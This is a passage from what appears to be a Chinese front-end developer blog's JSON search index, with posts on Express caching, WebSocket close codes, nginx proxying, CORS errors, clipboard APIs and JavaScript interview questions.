\u0026ldquo;Thomas Jefferson\u0026rdquo; OR | 包含A或者B | A OR B 或者 A | B | | nodejs OR webpack +-\u0026ldquo;OR | 指令可以组合,完成更复杂的查询 | | | beach -sandy +albert +nathaniel ~ | 包含A, 并且包含B的近义词 | A ~B | | github ~js .","title":"掌握谷歌搜索高级指令"},{"content":"1. 角色划分 名称 角色 账户 A 银行家 0 B 建筑商 100万 C 商人 0 2. 建筑商向银行存储100万 名称 角色 账户 A 银行家 100万 现金 B 建筑商 100万 支票 C 商人 0 2. 商人向银行贷款100万 此时银行的账户存款已经是0了,但是B还在银行存了100万。那银行究竟是还有100万呢, 还是一毛都没有了呢。\n此时建筑商如果要取现金,那么银行马上就要破产。\n名称 角色 账户 A 银行家 100现金 B 建筑商 100万 支票 C 商人 100万 支票 3. 
商人需要建筑商来建造房子 商人需要建筑商来建筑房子,费用是100万,付给建筑商,建筑商又把100支票存到银行\n名称 角色 账户 A 银行家 100万现金 B 建筑商 200万 支票 C 商人 0 商人又从银行借钱100万,来付给建筑商建房子,建筑商把钱存到银行\n名称 角色 账户 A 银行家 100万现金 B 建筑商 300万 支票 C 商人 0 只要这个循环还在继续,你会发现,建筑商的账面上的支票越来越多,但是银行始终都是100万现金存在那里,从来都没动过。\n💰就这样魔术般的产生, 如果银行那一天缺钱了,银行就拿一张纸出来,上面写着1000万。看!银行造钱就是那么容易。\n","permalink":"https://wdd.js.org/posts/2018/04/the-secret-of-bank-create-money/","summary":"1. 角色划分 名称 角色 账户 A 银行家 0 B 建筑商 100万 C 商人 0 2. 建筑商向银行存储100万 名称 角色 账户 A 银行家 100万 现金 B 建筑商 100万 支票 C 商人 0 2. 商人向银行贷款100万 此时银行的账户存款已经是0了,但是B还在银行存了100万。那银行究竟是还有100万呢, 还是一毛都没有了呢。\n此时建筑商如果要取现金,那么银行马上就要破产。\n名称 角色 账户 A 银行家 100现金 B 建筑商 100万 支票 C 商人 100万 支票 3. 商人需要建筑商来建造房子 商人需要建筑商来建筑房子,费用是100万,付给建筑商,建筑商又把100支票存到银行\n名称 角色 账户 A 银行家 100万现金 B 建筑商 200万 支票 C 商人 0 商人又从银行借钱100万,来付给建筑商建房子,建筑商把钱存到银行\n名称 角色 账户 A 银行家 100万现金 B 建筑商 300万 支票 C 商人 0 只要这个循环还在继续,你会发现,建筑商的账面上的支票越来越多,但是银行始终都是100万现金存在那里,从来都没动过。","title":"金钱游戏 - 银行造钱的秘密"},{"content":"1. Express设置缓存 Express设置静态文件的方法很简单,一行代码搞定。app.use(express.static(path.join(__dirname, 'public'), {maxAge: MAX_AGE})), 注意MAX_AGE的单位是毫秒。这句代码的含义是让pulic目录下的所有文件都可以在浏览器中缓存,过期时长为MAX_AGE毫秒。\napp.use(express.static(path.join(__dirname, \u0026#39;public\u0026#39;), {maxAge: config.get(\u0026#39;maxAge\u0026#39;)})) 2. Express让浏览器清除缓存 缓存的好处是可以更快的访问服务,但是缓存也有坏处。例如设置缓存为10天,第二天的时候服务更新了。如果客户端不强制刷新页面的话,浏览器会一致使用更新前的静态文件,这样会导致一些BUG。你总当每次出问题时,客户打电话给你后,你让他强制刷新浏览器吧?\n所以,最好在服务重启后,重新让浏览器获取最新的静态文件。\n设置的方式是给每一个静态文件设置一个时间戳。\n例如:vendor/loadjs/load.js?_=123898923423\u0026quot;\u0026gt;\u0026lt;/script\u0026gt;\n2.1. Express 路由 // /routes/index.js router.get(\u0026#39;/home\u0026#39;, function (req, res, next) { res.render(\u0026#39;home\u0026#39;, {config: config, serverStartTimestamp: new Date().getTime()}) }) 2.2. 视图文件 // views/home.html \u0026lt;script src=\u0026#34;vendor/loadjs/load.js?_=\u0026lt;%= serverStartTimestamp %\u0026gt;\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; 设置之后,每次服务更新或者重启,浏览器都会使用最新的时间戳serverStartTimestamp,去获取静态文件。\n2.3. 
动态加载JS文件 有时候js文件并不是直接在HTML中引入,可能是使用了一些js文件加载库,例如requirejs, LABjs等。这些情况下,可以在全局设置环境变量SERVER_START_TIMESTAMP,用来表示服务启动的时间戳,在获取js的时候,将该时间戳拼接在路径上。\n注意:环境变量SERVER_START_TIMESTAMP,一定要在其他脚本使用前定义。\n// views/home.html \u0026lt;script\u0026gt; var SERVER_START_TIMESTAMP = \u0026lt;%= serverStartTimestamp %\u0026gt; \u0026lt;/script\u0026gt; // load.js \u0026#39;vendor/contact-center/skill.js?_=\u0026#39; + SERVER_START_TIMESTAMP ","permalink":"https://wdd.js.org/posts/2018/04/express-static-file-cache-setting-and-cleaning/","summary":"1. Express设置缓存 Express设置静态文件的方法很简单,一行代码搞定。app.use(express.static(path.join(__dirname, 'public'), {maxAge: MAX_AGE})), 注意MAX_AGE的单位是毫秒。这句代码的含义是让pulic目录下的所有文件都可以在浏览器中缓存,过期时长为MAX_AGE毫秒。\napp.use(express.static(path.join(__dirname, \u0026#39;public\u0026#39;), {maxAge: config.get(\u0026#39;maxAge\u0026#39;)})) 2. Express让浏览器清除缓存 缓存的好处是可以更快的访问服务,但是缓存也有坏处。例如设置缓存为10天,第二天的时候服务更新了。如果客户端不强制刷新页面的话,浏览器会一致使用更新前的静态文件,这样会导致一些BUG。你总当每次出问题时,客户打电话给你后,你让他强制刷新浏览器吧?\n所以,最好在服务重启后,重新让浏览器获取最新的静态文件。\n设置的方式是给每一个静态文件设置一个时间戳。\n例如:vendor/loadjs/load.js?_=123898923423\u0026quot;\u0026gt;\u0026lt;/script\u0026gt;\n2.1. Express 路由 // /routes/index.js router.get(\u0026#39;/home\u0026#39;, function (req, res, next) { res.render(\u0026#39;home\u0026#39;, {config: config, serverStartTimestamp: new Date().getTime()}) }) 2.2. 视图文件 // views/home.html \u0026lt;script src=\u0026#34;vendor/loadjs/load.js?_=\u0026lt;%= serverStartTimestamp %\u0026gt;\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; 设置之后,每次服务更新或者重启,浏览器都会使用最新的时间戳serverStartTimestamp,去获取静态文件。\n2.3. 
动态加载JS文件 有时候js文件并不是直接在HTML中引入,可能是使用了一些js文件加载库,例如requirejs, LABjs等。这些情况下,可以在全局设置环境变量SERVER_START_TIMESTAMP,用来表示服务启动的时间戳,在获取js的时候,将该时间戳拼接在路径上。\n注意:环境变量SERVER_START_TIMESTAMP,一定要在其他脚本使用前定义。\n// views/home.html \u0026lt;script\u0026gt; var SERVER_START_TIMESTAMP = \u0026lt;%= serverStartTimestamp %\u0026gt; \u0026lt;/script\u0026gt; // load.js \u0026#39;vendor/contact-center/skill.js?_=\u0026#39; + SERVER_START_TIMESTAMP ","title":"Express静态文件浏览器缓存设置与缓存清除"},{"content":"1. 把错误打印出来 WebSocket断开的原因有很多,最好在WebSocket断开时,将错误打印出来。\n在线demo地址:https://wdd.js.org/websocket-demos/\nws.onerror = function (e) { console.log(\u0026#39;WebSocket发生错误: \u0026#39; + e.code) console.log(e) } 如果你想自己玩玩WebSocket, 但是你又不想自己部署一个WebSocket服务器,你可以使用ws = new WebSocket('wss://echo.websocket.org/'), 你向echo.websocket.org发送消息,它会回复你同样的消息。\n2. 重要信息错误状态码 WebSocket断开时,会触发CloseEvent, CloseEvent会在连接关闭时发送给使用 WebSockets 的客户端. 它在 WebSocket 对象的 onclose 事件监听器中使用。CloseEvent的code字段表示了WebSocket断开的原因。可以从该字段中分析断开的原因。\n3. 关闭状态码表 一般来说1006的错误码出现的情况比较常见,该错误码一般出现在断网时。\n状态码 名称 描述 0–999 保留段, 未使用. 1000 CLOSE_NORMAL 正常关闭; 无论为何目的而创建, 该链接都已成功完成任务. 1001 CLOSE_GOING_AWAY 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 1002 CLOSE_PROTOCOL_ERROR 由于协议错误而中断连接. 1003 CLOSE_UNSUPPORTED 由于接收到不允许的数据类型而断开连接 (如仅接收文本数据的终端接收到了二进制数据). 1004 保留. 其意义可能会在未来定义. 1005 CLOSE_NO_STATUS 保留. 表示没有收到预期的状态码. 1006 CLOSE_ABNORMAL 保留. 用于期望收到状态码时连接非正常关闭 (也就是说, 没有发送关闭帧). 1007 Unsupported Data 由于收到了格式不符的数据而断开连接 (如文本消息中包含了非 UTF-8 数据). 1008 Policy Violation 由于收到不符合约定的数据而断开连接. 这是一个通用状态码, 用于不适合使用 1003 和 1009 状态码的场景. 1009 CLOSE_TOO_LARGE 由于收到过大的数据帧而断开连接. 1010 Missing Extension 客户端期望服务器商定一个或多个拓展, 但服务器没有处理, 因此客户端断开连接. 1011 Internal Error 客户端由于遇到没有预料的情况阻止其完成请求, 因此服务端断开连接. 1012 Service Restart 服务器由于重启而断开连接. 1013 Try Again Later 服务器由于临时原因断开连接, 如服务器过载因此断开一部分客户端连接. 1014 由 WebSocket标准保留以便未来使用. 1015 TLS Handshake 保留. 表示连接由于无法完成 TLS 握手而关闭 (例如无法验证服务器证书). 1016–1999 由 WebSocket标准保留以便未来使用. 2000–2999 由 WebSocket拓展保留使用. 3000–3999 可以由库或框架使用.? 不应由应用使用. 可以在 IANA 注册, 先到先得. 4000–4999 可以由应用使用. 4. 
其他注意事项 如果你的服务所在的域是HTTPS的,那么使用的WebSocket协议也必须是wss, 而不能是ws\n5. 如何在老IE上使用原生WebSocket? web-socket-js是基于flash的技术,只需要引入两个js文件和一个swf文件,就可以让浏览器用于几乎原生的WebSocket接口。另外,web-socket-js还是需要在ws服务端843端口做一个flash安全策略文件的服务。\n我自己曾经基于stompjs和web-socket-js,做WebSocket兼容到IE5, 当然了stompjs在低版本的IE上有兼容性问题, 而且stompjs已经不再维护了,你可以使用我fork的一个版本,地址是:https://github.com/wangduanduan/stomp-websocket/blob/master/lib/stomp.js\n主要是老版本IE在正则表达式行为方面有点异常。\n// fix ie8, ie9, RegExp not normal problem // in chrome the frames length will be 2, but in ie8, ie9, it well be 1 // by wdd 20180321 if (frames.length === 1) { frames.push(\u0026#39;\u0026#39;) } 6. 参考 CloseEvent getting the reason why websockets closed with close code 1006 Defined Status Codes ","permalink":"https://wdd.js.org/posts/2018/03/websocket-close-reasons/","summary":"1. 把错误打印出来 WebSocket断开的原因有很多,最好在WebSocket断开时,将错误打印出来。\n在线demo地址:https://wdd.js.org/websocket-demos/\nws.onerror = function (e) { console.log(\u0026#39;WebSocket发生错误: \u0026#39; + e.code) console.log(e) } 如果你想自己玩玩WebSocket, 但是你又不想自己部署一个WebSocket服务器,你可以使用ws = new WebSocket('wss://echo.websocket.org/'), 你向echo.websocket.org发送消息,它会回复你同样的消息。\n2. 重要信息错误状态码 WebSocket断开时,会触发CloseEvent, CloseEvent会在连接关闭时发送给使用 WebSockets 的客户端. 它在 WebSocket 对象的 onclose 事件监听器中使用。CloseEvent的code字段表示了WebSocket断开的原因。可以从该字段中分析断开的原因。\n3. 关闭状态码表 一般来说1006的错误码出现的情况比较常见,该错误码一般出现在断网时。\n状态码 名称 描述 0–999 保留段, 未使用. 1000 CLOSE_NORMAL 正常关闭; 无论为何目的而创建, 该链接都已成功完成任务. 1001 CLOSE_GOING_AWAY 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 1002 CLOSE_PROTOCOL_ERROR 由于协议错误而中断连接. 1003 CLOSE_UNSUPPORTED 由于接收到不允许的数据类型而断开连接 (如仅接收文本数据的终端接收到了二进制数据). 1004 保留. 其意义可能会在未来定义. 1005 CLOSE_NO_STATUS 保留. 表示没有收到预期的状态码. 1006 CLOSE_ABNORMAL 保留. 
用于期望收到状态码时连接非正常关闭 (也就是说, 没有发送关闭帧).","title":"WebSocket断开原因分析"},{"content":"无论什么语言,都需要逻辑,而逻辑中,能否判断出真假,是最基本也是最重要技能之一。\nJS中的假值有6个 false '' undefinded null 0, +0, -0 NaN 有点类似假值的真值有两个 {} [] 空对象和空数组,很多初学者都很用把这两个当做假值。但是实际上他们是真值,你只需要记住,除了null之外的所有对象类型的数据,都是真值。\ntypeof null // \u0026#39;object\u0026#39; 据说:typeof null返回对象这是一个js语言中的bug。实际上typeof null应该返回null才比较准确,但是这个bug已经存来好久了。几乎所有的代码里都这样去判断。如果把typeof null给改成返回null, 那么这必定会导致JS世界末日。\n我们承认JS并不完美,她有很多小缺点,但是这并不妨碍她吸引万千开发者拜倒在她的石榴裙下。\n就像一首歌唱的:有些人说不清哪里好 但就是谁都替代不了\n","permalink":"https://wdd.js.org/posts/2018/03/js-true-and-false-value/","summary":"无论什么语言,都需要逻辑,而逻辑中,能否判断出真假,是最基本也是最重要技能之一。\nJS中的假值有6个 false '' undefinded null 0, +0, -0 NaN 有点类似假值的真值有两个 {} [] 空对象和空数组,很多初学者都很用把这两个当做假值。但是实际上他们是真值,你只需要记住,除了null之外的所有对象类型的数据,都是真值。\ntypeof null // \u0026#39;object\u0026#39; 据说:typeof null返回对象这是一个js语言中的bug。实际上typeof null应该返回null才比较准确,但是这个bug已经存来好久了。几乎所有的代码里都这样去判断。如果把typeof null给改成返回null, 那么这必定会导致JS世界末日。\n我们承认JS并不完美,她有很多小缺点,但是这并不妨碍她吸引万千开发者拜倒在她的石榴裙下。\n就像一首歌唱的:有些人说不清哪里好 但就是谁都替代不了","title":"js中的真值和假值"},{"content":"1. 
AWS EC2 不支持WebSocket 直达解决方案 英文版\n简单说一下思路:WebSocket底层基于TCP协议的,如果你的服务器基于HTTP协议暴露80端口,那WebSocket肯定无法连接。你只要将HTTP协议修改成TCP协议就可以了。\n然后是安全组的配置:\n同样如果使用了NGINX作为反向代理,那么NGINX也需要做配置的。\n// https://gist.githubusercontent.com/unshift/324be6a8dc9e880d4d670de0dc97a8ce/raw/29507ed6b3c9394ecd7842f9d3228827cffd1c58/elasticbeanstalk_websockets files: \u0026#34;/etc/nginx/conf.d/01_websockets.conf\u0026#34; : mode: \u0026#34;000644\u0026#34; owner: root group: root content : | upstream nodejs { server 127.0.0.1:8081; keepalive 256; } server { listen 8080; location / { proxy_pass http://nodejs; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection \u0026#34;upgrade\u0026#34;; proxy_http_version 1.1; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; } } \u0026#34;/opt/elasticbeanstalk/hooks/appdeploy/enact/41_remove_eb_nginx_confg.sh\u0026#34;: mode: \u0026#34;000755\u0026#34; owner: root group: root content : | mv /etc/nginx/conf.d/00_elastic_beanstalk_proxy.conf /etc/nginx/conf.d/00_elastic_beanstalk_proxy.conf.old 2. NGINX做反向代理是需要注意的问题 如果排除所有问题后,那剩下的问题可以考虑出在反向代理上,一下有几点是可以考虑的。\nHTTP的版本问题: http有三个版本,http 1.0, 1.1, 2.0, 现在主流的浏览器都是使用http 1.1版本,为了保证更好的兼容性,最好转发时不要修改协议的版本号\nNGINX具有路径重写功能,如果你使用了该功能,就要考虑问题可能出在这里,因为NGINX在路径重写时,需要对路径进行编解码,有可能在解码之后,没有编码就发送给后端的服务器,导致后端服务器无法对URL进行解码。\n3. IE8 IE9 有没有简单方便支持WebSocket的方案 目前测试下来,最简单方案是基于flash的。参考:https://github.com/gimite/web-socket-js,\n注意该方案需要在WebSocket服务上的843端口, 提供socket_policy_files, 也可以参考:A PolyFill for WebSockets\n网上也有教程是使用socket.io基于ajax长轮训的方案,如果服务端已经确定的情况下,一般是不会轻易改动服务端代码的。而且ajax长轮训也是有延迟,和disconnect时,无法回调的问题。\n4. stompjs connected后,没有调用connect_callBack 该问题主要是使用web-socket-js,在ie8,ie9上出现的\n该问题还没有分析出原因,但是看了stompjs的源码不是太多,明天用源码调试看看原因。\n问题已经找到,请参考:https://github.com/wangduanduan/stomp-websocket#about-ie8-ie9-use-websocket\n5. 
参考文献 STOMP Over WebSocket STOMP Protocol Specification, Version 1.1 Stomp Over Websocket文档, ","permalink":"https://wdd.js.org/posts/2018/03/stomp-over-websocket/","summary":"1. AWS EC2 不支持WebSocket 直达解决方案 英文版\n简单说一下思路:WebSocket底层基于TCP协议的,如果你的服务器基于HTTP协议暴露80端口,那WebSocket肯定无法连接。你只要将HTTP协议修改成TCP协议就可以了。\n然后是安全组的配置:\n同样如果使用了NGINX作为反向代理,那么NGINX也需要做配置的。\n// https://gist.githubusercontent.com/unshift/324be6a8dc9e880d4d670de0dc97a8ce/raw/29507ed6b3c9394ecd7842f9d3228827cffd1c58/elasticbeanstalk_websockets files: \u0026#34;/etc/nginx/conf.d/01_websockets.conf\u0026#34; : mode: \u0026#34;000644\u0026#34; owner: root group: root content : | upstream nodejs { server 127.0.0.1:8081; keepalive 256; } server { listen 8080; location / { proxy_pass http://nodejs; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection \u0026#34;upgrade\u0026#34;; proxy_http_version 1.1; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; } } \u0026#34;/opt/elasticbeanstalk/hooks/appdeploy/enact/41_remove_eb_nginx_confg.sh\u0026#34;: mode: \u0026#34;000755\u0026#34; owner: root group: root content : | mv /etc/nginx/conf.","title":"在实践中我遇到stompjs, websocket和nginx的问题与总结"},{"content":"1. 问题现象 HTTP 状态码为 200 OK 时, jquery ajax报错\n2. 问题原因 jquery ajax的dataType字段包含:json, 但是服务端返回的数据不是规范的json格式,导致jquery解析json字符串报错,最终导致ajax报错。\njQuery ajax 官方文档上说明:\n\u0026ldquo;json\u0026rdquo;: Evaluates the response as JSON and returns a JavaScript object. Cross-domain \u0026ldquo;json\u0026rdquo; requests are converted to \u0026ldquo;jsonp\u0026rdquo; unless the request includes jsonp: false in its request options. The JSON data is parsed in a strict manner; any malformed JSON is rejected and a parse error is thrown. As of jQuery 1.9, an empty response is also rejected; the server should return a response of null or {} instead. 
(See json.org for more information on proper JSON formatting.)\n设置dataType为json时,jquery就会去解析响应体为JavaScript对象。跨域的json请求会被转化成jsonp, 除非设置了jsonp: false。JSON数据会以严格模式去解析,任何不规范的JSON字符串都会解析异常并抛出错误。从jQuery 1.9起,一个空的响应也会被拒绝并抛出异常。服务端应该返回一个null或者{}去代替空响应。参考json.org, 查看更多内容\n3. 解决方案 这个问题的原因是后端返回的数据格式不规范,所以后端在返回结果时,不要使用空的响应,也不应该去手动拼接JSON字符串,而应该交给相应的库来实现JSON序列化字符串工作。\n方案1: 如果后端确定响应体中不返回数据,那么就把状态码设置为204,而不是200。我一直逼着后端同事这么做。 方案2:如果后端接口想返回200,那么请返回一个null或者{}去代替空响应 方案3:别用jQuery的ajax,换个其他的库试试 4. 参考 Ajax request returns 200 OK, but an error event is fired instead of success jQuery.ajax ","permalink":"https://wdd.js.org/posts/2018/03/status-code-200-jquery-ajax-failed/","summary":"1. 问题现象 HTTP 状态码为 200 OK 时, jquery ajax报错\n2. 问题原因 jquery ajax的dataType字段包含:json, 但是服务端返回的数据不是规范的json格式,导致jquery解析json字符串报错,最终导致ajax报错。\njQuery ajax 官方文档上说明:\n\u0026ldquo;json\u0026rdquo;: Evaluates the response as JSON and returns a JavaScript object. Cross-domain \u0026ldquo;json\u0026rdquo; requests are converted to \u0026ldquo;jsonp\u0026rdquo; unless the request includes jsonp: false in its request options. The JSON data is parsed in a strict manner; any malformed JSON is rejected and a parse error is thrown. As of jQuery 1.9, an empty response is also rejected; the server should return a response of null or {} instead.","title":"状态码为200时 jQuery ajax报错"},{"content":"1. 兼容情况 如果想浏览器支持粘贴功能,那么浏览器必须支持,document.execCommand(\u0026lsquo;copy\u0026rsquo;)方法,也可以根据document.queryCommandEnabled(\u0026lsquo;copy\u0026rsquo;),返回的true或者false判断浏览器是否支持copy命令。\n从下表可以看出,主流的浏览器都支持execCommand命令\n2. 复制的原理 查询元素 选中元素 执行复制命令 3. 代码展示 // html \u0026lt;input id=\u0026#34;username\u0026#34; value=\u0026#34;123456\u0026#34;\u0026gt; // 查询元素 var username = document.getElementById(\u0026#39;username\u0026#39;) // 选中元素 username.select() // 执行复制 document.execCommand(\u0026#39;copy\u0026#39;) 注意: 以上代码只是简单示意,在实践过程中还有几个要判断的情况\n首先要去检测浏览器的execCommand能力 选取元素时,有可能选取元素为空,要考虑这种情况的处理 4. 
第三方方案 clipboard.js是一个比较方便的剪贴板库,功能蛮多的。\n\u0026lt;!-- Target --\u0026gt; \u0026lt;textarea id=\u0026#34;bar\u0026#34;\u0026gt;Mussum ipsum cacilds...\u0026lt;/textarea\u0026gt; \u0026lt;!-- Trigger --\u0026gt; \u0026lt;button class=\u0026#34;btn\u0026#34; data-clipboard-action=\u0026#34;cut\u0026#34; data-clipboard-target=\u0026#34;#bar\u0026#34;\u0026gt; Cut to clipboard \u0026lt;/button\u0026gt; 官方给的代码里有上面的一个示例,如果你用了这个示例,但是不起作用,那你估计是没有初始化ClipboardJS实例的。\n注意:下面的函数必须要主动调用,这样才能给相应的DOM元素注册事件。 ClipboardJS源代码压缩后大约有3kb,虽然很小了,但是如果你不需要它的这么多功能的话,其实你自己写几行代码就可以搞定复制功能。\nnew ClipboardJS(\u0026#39;.btn\u0026#39;); ","permalink":"https://wdd.js.org/posts/2018/03/clipboard-copy-tutorial/","summary":"1. 兼容情况 如果想浏览器支持粘贴功能,那么浏览器必须支持,document.execCommand(\u0026lsquo;copy\u0026rsquo;)方法,也可以根据document.queryCommandEnabled(\u0026lsquo;copy\u0026rsquo;),返回的true或者false判断浏览器是否支持copy命令。\n从下表可以看出,主流的浏览器都支持execCommand命令\n2. 复制的原理 查询元素 选中元素 执行复制命令 3. 代码展示 // html \u0026lt;input id=\u0026#34;username\u0026#34; value=\u0026#34;123456\u0026#34;\u0026gt; // 查询元素 var username = document.getElementById(\u0026#39;username\u0026#39;) // 选中元素 username.select() // 执行复制 document.execCommand(\u0026#39;copy\u0026#39;) 注意: 以上代码只是简单示意,在实践过程中还有几个要判断的情况\n首先要去检测浏览器的execCommand能力 选取元素时,有可能选取元素为空,要考虑这种情况的处理 4. 第三方方案 clipboard.js是一个比较方便的剪贴板库,功能蛮多的。\n\u0026lt;!-- Target --\u0026gt; \u0026lt;textarea id=\u0026#34;bar\u0026#34;\u0026gt;Mussum ipsum cacilds...\u0026lt;/textarea\u0026gt; \u0026lt;!-- Trigger --\u0026gt; \u0026lt;button class=\u0026#34;btn\u0026#34; data-clipboard-action=\u0026#34;cut\u0026#34; data-clipboard-target=\u0026#34;#bar\u0026#34;\u0026gt; Cut to clipboard \u0026lt;/button\u0026gt; 官方给的代码里有上面的一个示例,如果你用了这个示例,但是不起作用,那你估计是没有初始化ClipboardJS实例的。\n注意:下面的函数必须要主动调用,这样才能给相应的DOM元素注册事件。 ClipboardJS源代码压缩后大约有3kb,虽然很小了,但是如果你不需要它的这么多功能的话,其实你自己写几行代码就可以搞定复制功能。\nnew ClipboardJS(\u0026#39;.btn\u0026#39;); ","title":"前端剪贴板复制功能实现原理"},{"content":"1. 
问题表现 以file:///xxx.html打开某个html文件,发送ajax请求时报错:\nResponse to preflight request doesn\u0026#39;t pass access control check: The \u0026#39;Access-Control-Allow-Origin\u0026#39; header has a value \u0026#39;null\u0026#39; that is not equal to the supplied origin. Origin \u0026#39;null\u0026#39; is therefore not allowed access. 2. 问题原因 Origin null是本地文件系统,因此这表明您正在加载通过file:// URL进行加载调用的HTML页面(例如,只需在本地文件浏览器或类似文件中双击它)。不同的浏览器采用不同的方法将同源策略应用到本地文件。Chrome要求比较严格,不允许这种形式的跨域请求。最好使用http:// 访问html.\n3. 解决方案 以下给出三个解决方案,第一个最快,第三个最彻底。\n3.1. 方案1 给Chrome快捷方式中增加 \u0026ndash;allow-file-access-from-files 打开Chrome快捷方式的属性中设置:右击Chrome浏览器快捷方式,选择“属性”,在“目标”中加\u0026quot;\u0026ndash;allow-file-access-from-files\u0026quot;,注意前面有个空格,重启Chrome浏览器便可。\n3.2. 方案2 启动一个简单的静态文件服务器, 以http协议访问html 参见我的这篇文章: 一行命令搭建简易静态文件http服务器\n3.3. 方案3 服务端响应修改Access-Control-Allow-Origin : * response.addHeader(\u0026#34;Access-Control-Allow-Origin\u0026#34;,\u0026#34;*\u0026#34;) 4. 参考文章 如何解决XMLHttpRequest cannot load file~~~~~~~Origin \u0026rsquo;null\u0026rsquo; is therefore not allowed access 让chrome支持本地Ajax请求,Ajax请求status cancel Origin null is not allowed by Access-Control-Allow-Origin Origin null is not allowed by Access-Control-Allow-Origin ","permalink":"https://wdd.js.org/posts/2018/03/origin-null-is-not-allowed/","summary":"1. 问题表现 以file:///xxx.html打开某个html文件,发送ajax请求时报错:\nResponse to preflight request doesn\u0026#39;t pass access control check: The \u0026#39;Access-Control-Allow-Origin\u0026#39; header has a value \u0026#39;null\u0026#39; that is not equal to the supplied origin. Origin \u0026#39;null\u0026#39; is therefore not allowed access. 2. 问题原因 Origin null是本地文件系统,因此这表明您正在加载通过file:// URL进行加载调用的HTML页面(例如,只需在本地文件浏览器或类似文件中双击它)。不同的浏览器采用不同的方法将同源策略应用到本地文件。Chrome要求比较严格,不允许这种形式的跨域请求。最好使用http:// 访问html.\n3. 解决方案 以下给出三个解决方案,第一个最快,第三个最彻底。\n3.1. 
方案1 给Chrome快捷方式中增加 \u0026ndash;allow-file-access-from-files 打开Chrome快捷方式的属性中设置:右击Chrome浏览器快捷方式,选择“属性”,在“目标”中加\u0026quot;\u0026ndash;allow-file-access-from-files\u0026quot;,注意前面有个空格,重启Chrome浏览器便可。\n3.2. 方案2 启动一个简单的静态文件服务器, 以http协议访问html 参见我的这篇文章: 一行命令搭建简易静态文件http服务器\n3.3. 方案3 服务端响应修改Access-Control-Allow-Origin : * response.addHeader(\u0026#34;Access-Control-Allow-Origin\u0026#34;,\u0026#34;*\u0026#34;) 4. 参考文章 如何解决XMLHttpRequest cannot load file~~~~~~~Origin \u0026rsquo;null\u0026rsquo; is therefore not allowed access 让chrome支持本地Ajax请求,Ajax请求status cancel Origin null is not allowed by Access-Control-Allow-Origin Origin null is not allowed by Access-Control-Allow-Origin ","title":"Chrome本地跨域origin-null-is-not-allowed问题分析与解决方案"},{"content":"1. 功能最强:regex101 优点:\n支持多种语言, pcre,php,javascript,python,golang 界面美观大方 支持错误提示,实时匹配 缺点:\n有时候加载速度太慢 2. 可视化正则绘图: Regulex 优点:\n实时根据正则表达式绘图 页面加载速度快 3. 可视化正则绘图:regexper 优点:\n根据正则表达式绘图 页面加载速度快 缺点:\n无法实时绘图,需要点击才可以 4. 专注于python正则:pyregex 专注python 页面加载速度快 ","permalink":"https://wdd.js.org/posts/2018/02/regex-online-tools/","summary":"1. 功能最强:regex101 优点:\n支持多种语言, pcre,php,javascript,python,golang 界面美观大方 支持错误提示,实时匹配 缺点:\n有时候加载速度太慢 2. 可视化正则绘图: Regulex 优点:\n实时根据正则表达式绘图 页面加载速度快 3. 可视化正则绘图:regexper 优点:\n根据正则表达式绘图 页面加载速度快 缺点:\n无法实时绘图,需要点击才可以 4. 专注于python正则:pyregex 专注python 页面加载速度快 ","title":"正则表达式在线工具集合"},{"content":"1. 问答题 1.1. HTML相关 1.1.1. 的作用是什么? 1.1.2. script, script async和script defer之间有什么区别? 1.1.3. cookie, sessionStorage 和 localStorage之间有什么区别? 1.1.4. 用过哪些html模板渲染工具? 1.2. CSS相关 1.2.1. 简述CSS盒子模型 1.2.2. CSS有哪些选择器? 1.2.3. CSS sprite是什么? 1.2.4. 写一下你知道的前端UI框架? 1.3. JS相关 1.3.1. js有哪些数据类型? 1.3.2. js有哪些假值? 1.3.3. js数字和字符串之间有什么快速转换的写法? 1.3.4. 经常使用哪些ES6的语法? 1.3.5. 什么是同源策略? 1.3.6. 跨域有哪些解决方法? 1.3.7. 网页进度条实现的原理 1.3.8. 请问console.log是同步的,还是异步的? 1.3.9. 下面console输出的值是什么? var scores = [10,11,12]; var total = 0; for(var score in scores){ total += score; } var average = total/scores.length; console.log(average); 1.3.10. 请问下面的写法问题在哪? 
console.log(1) (function(){ console.log(1) })() 1.3.11. 请问s.length是多少,s[2]是多少 var s = [] s[3] = 4 s.length ? s[2] ? 1.3.12. 说说你对setTimeout的深入理解? setTimeout(function(){ console.log(\u0026#39;hi\u0026#39;) }, 1000) 1.3.13. 解释闭包概念及其作用 1.3.14. 如何理解js 函数first class的概念? 1.3.15. 函数有哪些调用方式?不同的调用方式下this会指向哪里? 1.3.16. apply和call有什么区别? 1.3.17. 函数的length属性代表什么? 1.3.18. 用过哪些js编程风格? 1.3.19. 如何理解EventLoop? 1.3.20. 使用过哪些构建工具?各有什么优缺点? 1.4. 其它 1.4.1. 平时使用什么搜索引擎查资料? 1.4.2. 对翻墙有什么看法?如何翻墙? 1.4.3. 个人有没有技术博客,地址是什么? 1.4.4. github上有没有项目? 1.5. 网络相关 1.5.1. 请求状态码 1xx,2xx,3xx,4xx,5xx分别有什么含义? 1.5.2. 发送某些post请求时,有时会多一些options请求,请问这是为什么? 1.5.3. http报文有哪些组成部分? 1.5.4. http端到端首部和逐跳首部有什么区别? 1.5.5. http与https在同时使用时,有什么注意点? 1.5.6. http, tcp, udp, websocket,分别位于7层网络的哪一层?tcp和udp有什么不同? 2. 编码题 2.1. 写一个函数,返回一个数组中所有元素被第一个元素除后的结果 2.2. 写一个函数,来判断变量是否是数组,至少使用两种写法 2.3. 写一个函数,将秒转化成时分秒格式,如80转化成:00:01:20 2.4. 写一个函数,将对象中属性值为\u0026rsquo;\u0026rsquo;, undefined, null的属性删除掉 // 处理前 var obj = { name: \u0026#39;wdd\u0026#39;, address: { code: \u0026#39;\u0026#39;, tt: null, age: 1 }, ss: [], vv: undefined } // 处理后 { name: \u0026#39;wdd\u0026#39;, address: { age: 1 }, ss: [] } 3. 翻译题 Aggregation operations process data records and return computed results. Aggregation operations group values from multiple documents together, and can perform a variety of operations on the grouped data to return a single result. MongoDB provides three ways to perform 